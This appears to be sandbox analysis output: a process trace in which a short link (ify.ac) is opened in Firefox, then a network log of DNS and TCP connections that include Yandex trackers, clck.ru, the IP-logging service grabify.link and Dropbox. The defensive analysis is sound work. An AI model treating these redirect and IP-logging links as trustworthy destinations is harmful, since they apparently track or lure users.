/usr/share//applications/libreoffice-draw.desktop /usr/share//applications/libreoffice-impress.desktop /usr/share//applications/libreoffice-math.desktop /usr/share//applications/libreoffice-startcenter.desktop /usr/share//applications/libreoffice-writer.desktop /usr/share//applications/libreoffice-xsltfilter.desktop /usr/share//applications/nautilus-autorun-software.desktop /usr/share//applications/nm-applet.desktop /usr/share//applications/nm-connection-editor.desktop /usr/share//applications/org.freedesktop.IBus.Panel.Emojier.desktop /usr/share//applications/org.freedesktop.IBus.Panel.Extension.Gtk3.desktop /usr/share//applications/org.freedesktop.IBus.Panel.Wayland.Gtk3.desktop /usr/share//applications/org.freedesktop.IBus.Setup.desktop /usr/share//applications/org.freedesktop.Xwayland.desktop /usr/share//applications/org.gnome.Calculator.desktop /usr/share//applications/org.gnome.Calendar.desktop /usr/share//applications/org.gnome.Characters.desktop /usr/share//applications/org.gnome.DejaDup.desktop /usr/share//applications/org.gnome.DiskUtility.desktop /usr/share//applications/org.gnome.Evince-previewer.desktop /usr/share//applications/org.gnome.Evince.desktop /usr/share//applications/org.gnome.Evolution-alarm-notify.desktop /usr/share//applications/org.gnome.FileRoller.desktop /usr/share//applications/org.gnome.Logs.desktop /usr/share//applications/org.gnome.Nautilus.desktop /usr/share//applications/org.gnome.OnlineAccounts.OAuth2.desktop /usr/share//applications/org.gnome.PowerStats.desktop /usr/share//applications/org.gnome.RemoteDesktop.Handover.desktop /usr/share//applications/org.gnome.Rhythmbox3.desktop /usr/share//applications/org.gnome.Rhythmbox3.device.desktop /usr/share//applications/org.gnome.Settings.desktop /usr/share//applications/org.gnome.Shell.Extensions.desktop /usr/share//applications/org.gnome.Shell.PortalHelper.desktop /usr/share//applications/org.gnome.Shell.desktop /usr/share//applications/org.gnome.Shotwell-Viewer.desktop /usr/share//applications/org.gnome.Shotwell.Auth.desktop /usr/share//applications/org.gnome.Shotwell.desktop /usr/share//applications/org.gnome.Snapshot.desktop /usr/share//applications/org.gnome.SystemMonitor.desktop /usr/share//applications/org.gnome.Tecla.desktop /usr/share//applications/org.gnome.Terminal.Preferences.desktop /usr/share//applications/org.gnome.Terminal.desktop /usr/share//applications/org.gnome.TextEditor.desktop /usr/share//applications/org.gnome.Totem.desktop /usr/share//applications/org.gnome.Zenity.desktop /usr/share//applications/org.gnome.baobab.desktop /usr/share//applications/org.gnome.clocks.desktop /usr/share//applications/org.gnome.eog.desktop /usr/share//applications/org.gnome.evolution-data-server.OAuth2-handler.desktop /usr/share//applications/org.gnome.font-viewer.desktop /usr/share//applications/org.gnome.seahorse.Application.desktop /usr/share//applications/org.remmina.Remmina-file.desktop /usr/share//applications/org.remmina.Remmina.desktop /usr/share//applications/python3.12.desktop /usr/share//applications/remmina-gnome.desktop /usr/share//applications/rygel.desktop /usr/share//applications/simple-scan.desktop /usr/share//applications/snap-handle-link.desktop /usr/share//applications/software-properties-drivers.desktop /usr/share//applications/software-properties-gtk.desktop /usr/share//applications/software-properties-livepatch.desktop /usr/share//applications/thunderbird.desktop /usr/share//applications/transmission-gtk.desktop /usr/share//applications/update-manager.desktop /usr/share//applications/usb-creator-gtk.desktop /usr/share//applications/xdg-desktop-portal-gnome.desktop /usr/share//applications/xdg-desktop-portal-gtk.desktop /usr/share//applications/yelp.desktop]
/usr/bin/grep
[grep -q %s]
/usr/bin/x-www-browser
[x-www-browser https://ify.ac/1IZk]
/usr/bin/xdg-settings
[xdg-settings get default-web-browser]
/usr/bin/dbus-send
[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]
/usr/bin/xprop
[xprop -root _DT_SAVE_MODE]
/usr/bin/grep
[grep = \"xfce4\"$]
/usr/bin/xprop
[xprop -root]
/usr/bin/grep
[grep -i ^xfce_desktop_window]
/usr/bin/grep
[grep -q ^Enlightenment]
/usr/bin/uname
[uname]
/usr/bin/xdg-mime
[xdg-mime query default x-scheme-handler/http]
/usr/bin/dbus-send
[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]
/usr/bin/xprop
[xprop -root _DT_SAVE_MODE]
/usr/bin/grep
[grep = \"xfce4\"$]
/usr/bin/xprop
[xprop -root]
/usr/bin/grep
[grep -i ^xfce_desktop_window]
/usr/bin/grep
[grep -q ^Enlightenment]
/usr/bin/uname
[uname]
/usr/bin/sed
[sed s/:/ /g]
/usr/bin/grep
[grep x-scheme-handler/http= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/http= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/http= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/http= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/http= /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/http= /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/sed
[sed s/:/ /g]
/usr/bin/grep
[grep -l x-scheme-handler/http; /.local/share/applications/*.desktop]
/usr/bin/grep
[grep -l x-scheme-handler/http; /usr/local/share//applications/*.desktop]
/usr/bin/grep
[grep -l x-scheme-handler/http; /usr/share//applications/apport-gtk.desktop /usr/share//applications/bluetooth-sendto.desktop /usr/share//applications/display-im6.q16.desktop /usr/share//applications/gcr-prompter.desktop /usr/share//applications/gcr-viewer.desktop /usr/share//applications/geoclue-demo-agent.desktop /usr/share//applications/gkbd-keyboard-display.desktop /usr/share//applications/gnome-about-panel.desktop /usr/share//applications/gnome-applications-panel.desktop /usr/share//applications/gnome-background-panel.desktop /usr/share//applications/gnome-bluetooth-panel.desktop /usr/share//applications/gnome-color-panel.desktop /usr/share//applications/gnome-datetime-panel.desktop /usr/share//applications/gnome-disk-image-mounter.desktop /usr/share//applications/gnome-disk-image-writer.desktop /usr/share//applications/gnome-display-panel.desktop /usr/share//applications/gnome-initial-setup.desktop /usr/share//applications/gnome-keyboard-panel.desktop /usr/share//applications/gnome-language-selector.desktop /usr/share//applications/gnome-mouse-panel.desktop /usr/share//applications/gnome-multitasking-panel.desktop /usr/share//applications/gnome-network-panel.desktop /usr/share//applications/gnome-notifications-panel.desktop /usr/share//applications/gnome-online-accounts-panel.desktop /usr/share//applications/gnome-power-panel.desktop /usr/share//applications/gnome-printers-panel.desktop /usr/share//applications/gnome-privacy-panel.desktop /usr/share//applications/gnome-region-panel.desktop /usr/share//applications/gnome-search-panel.desktop /usr/share//applications/gnome-session-properties.desktop /usr/share//applications/gnome-sharing-panel.desktop /usr/share//applications/gnome-sound-panel.desktop /usr/share//applications/gnome-system-monitor-kde.desktop /usr/share//applications/gnome-system-panel.desktop /usr/share//applications/gnome-ubuntu-panel.desktop /usr/share//applications/gnome-universal-access-panel.desktop /usr/share//applications/gnome-users-panel.desktop /usr/share//applications/gnome-wacom-panel.desktop /usr/share//applications/gnome-wifi-panel.desktop /usr/share//applications/gnome-wwan-panel.desktop /usr/share//applications/hplj1020.desktop /usr/share//applications/ibus-setup-table.desktop /usr/share//applications/im-config.desktop /usr/share//applications/io.snapcraft.SessionAgent.desktop /usr/share//applications/libreoffice-calc.desktop /usr/share//applications/libreoffice-draw.desktop /usr/share//applications/libreoffice-impress.desktop /usr/share//applications/libreoffice-math.desktop /usr/share//applications/libreoffice-startcenter.desktop /usr/share//applications/libreoffice-writer.desktop /usr/share//applications/libreoffice-xsltfilter.desktop /usr/share//applications/nautilus-autorun-software.desktop /usr/share//applications/nm-applet.desktop /usr/share//applications/nm-connection-editor.desktop /usr/share//applications/org.freedesktop.IBus.Panel.Emojier.desktop /usr/share//applications/org.freedesktop.IBus.Panel.Extension.Gtk3.desktop /usr/share//applications/org.freedesktop.IBus.Panel.Wayland.Gtk3.desktop /usr/share//applications/org.freedesktop.IBus.Setup.desktop /usr/share//applications/org.freedesktop.Xwayland.desktop /usr/share//applications/org.gnome.Calculator.desktop /usr/share//applications/org.gnome.Calendar.desktop /usr/share//applications/org.gnome.Characters.desktop /usr/share//applications/org.gnome.DejaDup.desktop /usr/share//applications/org.gnome.DiskUtility.desktop /usr/share//applications/org.gnome.Evince-previewer.desktop /usr/share//applications/org.gnome.Evince.desktop /usr/share//applications/org.gnome.Evolution-alarm-notify.desktop /usr/share//applications/org.gnome.FileRoller.desktop /usr/share//applications/org.gnome.Logs.desktop /usr/share//applications/org.gnome.Nautilus.desktop /usr/share//applications/org.gnome.OnlineAccounts.OAuth2.desktop /usr/share//applications/org.gnome.PowerStats.desktop /usr/share//applications/org.gnome.RemoteDesktop.Handover.desktop /usr/share//applications/org.gnome.Rhythmbox3.desktop /usr/share//applications/org.gnome.Rhythmbox3.device.desktop /usr/share//applications/org.gnome.Settings.desktop /usr/share//applications/org.gnome.Shell.Extensions.desktop /usr/share//applications/org.gnome.Shell.PortalHelper.desktop /usr/share//applications/org.gnome.Shell.desktop /usr/share//applications/org.gnome.Shotwell-Viewer.desktop /usr/share//applications/org.gnome.Shotwell.Auth.desktop /usr/share//applications/org.gnome.Shotwell.desktop /usr/share//applications/org.gnome.Snapshot.desktop /usr/share//applications/org.gnome.SystemMonitor.desktop /usr/share//applications/org.gnome.Tecla.desktop /usr/share//applications/org.gnome.Terminal.Preferences.desktop /usr/share//applications/org.gnome.Terminal.desktop /usr/share//applications/org.gnome.TextEditor.desktop /usr/share//applications/org.gnome.Totem.desktop /usr/share//applications/org.gnome.Zenity.desktop /usr/share//applications/org.gnome.baobab.desktop /usr/share//applications/org.gnome.clocks.desktop /usr/share//applications/org.gnome.eog.desktop /usr/share//applications/org.gnome.evolution-data-server.OAuth2-handler.desktop /usr/share//applications/org.gnome.font-viewer.desktop /usr/share//applications/org.gnome.seahorse.Application.desktop /usr/share//applications/org.remmina.Remmina-file.desktop /usr/share//applications/org.remmina.Remmina.desktop /usr/share//applications/python3.12.desktop /usr/share//applications/remmina-gnome.desktop /usr/share//applications/rygel.desktop /usr/share//applications/simple-scan.desktop /usr/share//applications/snap-handle-link.desktop /usr/share//applications/software-properties-drivers.desktop /usr/share//applications/software-properties-gtk.desktop /usr/share//applications/software-properties-livepatch.desktop /usr/share//applications/thunderbird.desktop /usr/share//applications/transmission-gtk.desktop /usr/share//applications/update-manager.desktop /usr/share//applications/usb-creator-gtk.desktop /usr/share//applications/xdg-desktop-portal-gnome.desktop /usr/share//applications/xdg-desktop-portal-gtk.desktop /usr/share//applications/yelp.desktop]
/usr/bin/gsettings
[gsettings get org.gnome.shell favorite-apps]
/usr/bin/grep
[grep -q 'firefox.desktop']
/usr/bin/gsettings
[gsettings get com.canonical.Unity.Launcher favorites]
/usr/bin/grep
[grep -q 'application://firefox.desktop']
/usr/bin/gsettings
[gsettings get org.mate.panel object-id-list]
/usr/bin/which
[which qdbus]
/snap/bin/firefox
[/snap/bin/firefox https://ify.ac/1IZk]
/usr/lib/snapd/snap-seccomp
[/usr/lib/snapd/snap-seccomp version-info]
/usr/lib/snapd/snap-confine
[/usr/lib/snapd/snap-confine --base core22 snap.firefox.firefox /usr/lib/snapd/snap-exec firefox https://ify.ac/1IZk]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 92.123.143.185:80 | r10.o.lencr.org | tcp |
| GB | 92.123.143.185:80 | r10.o.lencr.org | tcp |
| US | 8.8.8.8:53 | ify.ac | udp |
| US | 8.8.8.8:53 | ify.ac | udp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | detectportal.firefox.com | udp |
| US | 8.8.8.8:53 | detectportal.firefox.com | udp |
| US | 104.21.23.148:443 | ify.ac | tcp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 34.107.221.82:80 | detectportal.firefox.com | tcp |
| US | 35.190.72.216:443 | location.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | www.mozilla.org | udp |
| US | 8.8.8.8:53 | www.mozilla.org | udp |
| US | 8.8.8.8:53 | www.mozorg.moz.works | udp |
| GB | 13.224.77.115:443 | www.mozilla.org | tcp |
| GB | 13.224.77.115:443 | www.mozilla.org | tcp |
| US | 8.8.8.8:53 | example.org | udp |
| US | 8.8.8.8:53 | example.org | udp |
| US | 8.8.8.8:53 | ipv4only.arpa | udp |
| US | 8.8.8.8:53 | ipv4only.arpa | udp |
| US | 34.107.221.82:80 | detectportal.firefox.com | tcp |
| US | 35.190.72.216:443 | location.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| GB | 92.123.143.185:80 | r11.o.lencr.org | tcp |
| US | 34.117.188.166:443 | spocs.getpocket.com | tcp |
| US | 104.21.23.148:443 | ify.ac | udp |
| US | 35.190.72.216:443 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | oasqi.nxt-psh.com | udp |
| US | 8.8.8.8:53 | oasqi.nxt-psh.com | udp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| US | 34.117.188.166:443 | spocs.getpocket.com | udp |
| US | 104.21.20.211:443 | oasqi.nxt-psh.com | tcp |
| RU | 93.158.134.119:443 | mc.yandex.ru | tcp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 104.21.20.211:443 | oasqi.nxt-psh.com | udp |
| US | 34.117.188.166:443 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | nxt-psh.com | udp |
| US | 8.8.8.8:53 | nxt-psh.com | udp |
| US | 104.21.20.211:443 | nxt-psh.com | tcp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| US | 104.21.20.211:443 | nxt-psh.com | udp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 52.33.222.107:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | tiles-cdn.prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | tiles-cdn.prod.ads.prod.webservices.mozgcp.net | udp |
| RU | 87.250.251.119:443 | mc.yandex.com | tcp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 34.36.165.17:443 | tiles-cdn.prod.ads.prod.webservices.mozgcp.net | tcp |
| US | 34.36.165.17:443 | tiles-cdn.prod.ads.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | img-getpocket.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | img-getpocket.cdn.mozilla.net | udp |
| US | 34.120.237.76:443 | img-getpocket.cdn.mozilla.net | tcp |
| US | 34.120.237.76:443 | img-getpocket.cdn.mozilla.net | tcp |
| US | 34.120.237.76:443 | img-getpocket.cdn.mozilla.net | tcp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 34.117.188.166:443 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | tcp |
| US | 34.107.243.93:443 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | ify.ac | udp |
| US | 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | normandy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | normandy.cdn.mozilla.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | normandy-cdn.services.mozilla.com | udp |
| US | 35.201.103.21:443 | normandy.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | classify-client.services.mozilla.com | udp |
| US | 8.8.8.8:53 | classify-client.services.mozilla.com | udp |
| US | 8.8.8.8:53 | www.amazon.co.uk | udp |
| US | 8.8.8.8:53 | www.amazon.co.uk | udp |
| US | 8.8.8.8:53 | uk.hotels.com | udp |
| US | 8.8.8.8:53 | uk.hotels.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | www.reddit.com | udp |
| US | 8.8.8.8:53 | www.reddit.com | udp |
| US | 8.8.8.8:53 | www.bbc.co.uk | udp |
| US | 8.8.8.8:53 | www.bbc.co.uk | udp |
| US | 8.8.8.8:53 | www.ebay.co.uk | udp |
| US | 8.8.8.8:53 | www.ebay.co.uk | udp |
| US | 8.8.8.8:53 | getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.com | udp |
| US | 8.8.8.8:53 | www.mozorg.moz.works | udp |
| US | 8.8.8.8:53 | www.telegraph.co.uk | udp |
| US | 8.8.8.8:53 | www.telegraph.co.uk | udp |
| US | 8.8.8.8:53 | www.hellofresh.co.uk | udp |
| US | 8.8.8.8:53 | www.hellofresh.co.uk | udp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod-classifyclient.normandy.prod.cloudops.mozgcp.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | e11847.a.akamaiedge.net | udp |
| US | 8.8.8.8:53 | reddit.map.fastly.net | udp |
| US | 8.8.8.8:53 | e8153.a.akamaiedge.net | udp |
| US | 34.98.75.36:443 | classify-client.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | incoming.telemetry.mozilla.org | udp |
| US | 8.8.8.8:53 | incoming.telemetry.mozilla.org | udp |
| US | 8.8.8.8:53 | telemetry-incoming.r53-2.services.mozilla.com | udp |
| US | 34.120.208.123:443 | incoming.telemetry.mozilla.org | tcp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | fp2e7a.wpc.phicdn.net | udp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | bbc.map.fastly.net | udp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | telemetry-incoming.r53-2.services.mozilla.com | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | time.com | udp |
| US | 8.8.8.8:53 | time.com | udp |
| US | 8.8.8.8:53 | www.theguardian.com | udp |
| US | 8.8.8.8:53 | www.theguardian.com | udp |
| US | 8.8.8.8:53 | play.forgeofempires.com | udp |
| US | 8.8.8.8:53 | play.forgeofempires.com | udp |
| US | 8.8.8.8:53 | www.independent.co.uk | udp |
| US | 8.8.8.8:53 | www.independent.co.uk | udp |
| US | 8.8.8.8:53 | www.womenshealthmag.com | udp |
| US | 8.8.8.8:53 | www.womenshealthmag.com | udp |
| US | 8.8.8.8:53 | gizmodo.com | udp |
| US | 8.8.8.8:53 | gizmodo.com | udp |
| US | 8.8.8.8:53 | hearst-hdm.map.fastly.net | udp |
| US | 1.1.1.1:53 | www.theguardian.com | udp |
| US | 1.1.1.1:53 | time.com | udp |
| US | 1.1.1.1:53 | www.theguardian.com | udp |
| US | 1.1.1.1:53 | time.com | udp |
| US | 1.1.1.1:53 | www.stylist.co.uk | udp |
| US | 1.1.1.1:53 | www.stylist.co.uk | udp |
| US | 1.1.1.1:53 | www.vox.com | udp |
| US | 1.1.1.1:53 | www.vox.com | udp |
| US | 1.1.1.1:53 | n.sni.global.fastly.net | udp |
| US | 1.1.1.1:53 | www.cntraveler.com | udp |
| US | 1.1.1.1:53 | www.cntraveler.com | udp |
| US | 1.1.1.1:53 | aus5.mozilla.org | udp |
| US | 1.1.1.1:53 | aus5.mozilla.org | udp |
| US | 1.1.1.1:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 35.244.181.201:443 | aus5.mozilla.org | tcp |
| US | 1.1.1.1:53 | fp2e7a.wpc.phicdn.net | udp |
| US | 1.1.1.1:53 | ciscobinary.openh264.org | udp |
| US | 1.1.1.1:53 | ciscobinary.openh264.org | udp |
| GB | 88.221.134.209:80 | ciscobinary.openh264.org | tcp |
| US | 1.1.1.1:53 | www.discovermagazine.com | udp |
| US | 1.1.1.1:53 | www.discovermagazine.com | udp |
| US | 1.1.1.1:53 | www.standard.co.uk | udp |
| US | 1.1.1.1:53 | www.standard.co.uk | udp |
| US | 1.1.1.1:53 | discover-prod-1777428142.us-east-1.elb.amazonaws.com | udp |
| US | 1.1.1.1:53 | www.esquire.com | udp |
| US | 1.1.1.1:53 | www.esquire.com | udp |
| US | 1.1.1.1:53 | www.thecut.com | udp |
| US | 1.1.1.1:53 | www.thecut.com | udp |
| US | 1.1.1.1:53 | vmtls-np.map.fastly.net | udp |
| US | 1.1.1.1:53 | hearst-hdm.map.fastly.net | udp |
| US | 1.1.1.1:53 | www.nytimes.com | udp |
| US | 1.1.1.1:53 | www.nytimes.com | udp |
| US | 1.1.1.1:53 | nytimes.map.fastly.net | udp |
| US | 1.1.1.1:53 | services.addons.mozilla.org | udp |
| US | 1.1.1.1:53 | services.addons.mozilla.org | udp |
| GB | 18.245.162.3:443 | services.addons.mozilla.org | tcp |
| US | 1.1.1.1:53 | versioncheck-bg.addons.mozilla.org | udp |
| US | 1.1.1.1:53 | versioncheck-bg.addons.mozilla.org | udp |
| US | 34.160.90.233:443 | versioncheck-bg.addons.mozilla.org | tcp |
| US | 34.160.90.233:443 | versioncheck-bg.addons.mozilla.org | udp |
| US | 1.1.1.1:53 | addons.mozilla.org | udp |
| US | 1.1.1.1:53 | addons.mozilla.org | udp |
| US | 1.1.1.1:53 | aus5.mozilla.org | udp |
| US | 1.1.1.1:53 | aus5.mozilla.org | udp |
| US | 1.1.1.1:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| GB | 13.224.132.52:443 | addons.mozilla.org | tcp |
| US | 1.1.1.1:53 | safebrowsing.googleapis.com | udp |
| US | 1.1.1.1:53 | safebrowsing.googleapis.com | udp |
| GB | 142.250.180.10:443 | safebrowsing.googleapis.com | tcp |
| US | 1.1.1.1:53 | o.pki.goog | udp |
| US | 1.1.1.1:53 | o.pki.goog | udp |
| GB | 216.58.204.67:80 | o.pki.goog | tcp |
| GB | 142.250.180.10:443 | safebrowsing.googleapis.com | udp |
| US | 1.1.1.1:53 | detectportal.firefox.com | udp |
| US | 1.1.1.1:53 | detectportal.firefox.com | udp |
| US | 1.1.1.1:53 | ipv4only.arpa | udp |
| US | 1.1.1.1:53 | ipv4only.arpa | udp |
| US | 1.1.1.1:53 | ipv4only.arpa | udp |
| US | 1.1.1.1:53 | ify.ac | udp |
| US | 104.21.23.148:443 | ify.ac | tcp |
| US | 1.1.1.1:53 | mc.yandex.com | udp |
| US | 1.1.1.1:53 | mc.yandex.com | udp |
| US | 1.1.1.1:53 | ify.ac | udp |
| US | 104.21.23.148:443 | ify.ac | udp |
| US | 1.1.1.1:53 | clck.ru | udp |
| US | 1.1.1.1:53 | clck.ru | udp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| US | 1.1.1.1:53 | sba.yandex.ru | udp |
| US | 1.1.1.1:53 | sba.yandex.ru | udp |
| US | 8.8.8.8:53 | ify.ac | udp |
| US | 8.8.8.8:53 | ify.ac | udp |
| US | 8.8.8.8:53 | sba.yandex.ru | udp |
| US | 8.8.8.8:53 | sba.yandex.ru | udp |
| US | 1.1.1.1:53 | sba.yandex.ru | udp |
| US | 1.1.1.1:53 | sba.yandex.ru | udp |
| RU | 77.88.21.232:443 | sba.yandex.ru | tcp |
| US | 1.1.1.1:53 | grabify.link | udp |
| US | 1.1.1.1:53 | grabify.link | udp |
| US | 104.26.9.202:443 | grabify.link | tcp |
| US | 104.26.9.202:443 | grabify.link | udp |
| US | 1.1.1.1:53 | www.dropbox.com | udp |
| US | 1.1.1.1:53 | www.dropbox.com | udp |
| GB | 162.125.64.18:443 | www.dropbox.com | tcp |
| US | 1.1.1.1:53 | fp2e7a.wpc.phicdn.net | udp |
| US | 1.1.1.1:53 | cfl.dropboxstatic.com | udp |
| US | 1.1.1.1:53 | cfl.dropboxstatic.com | udp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
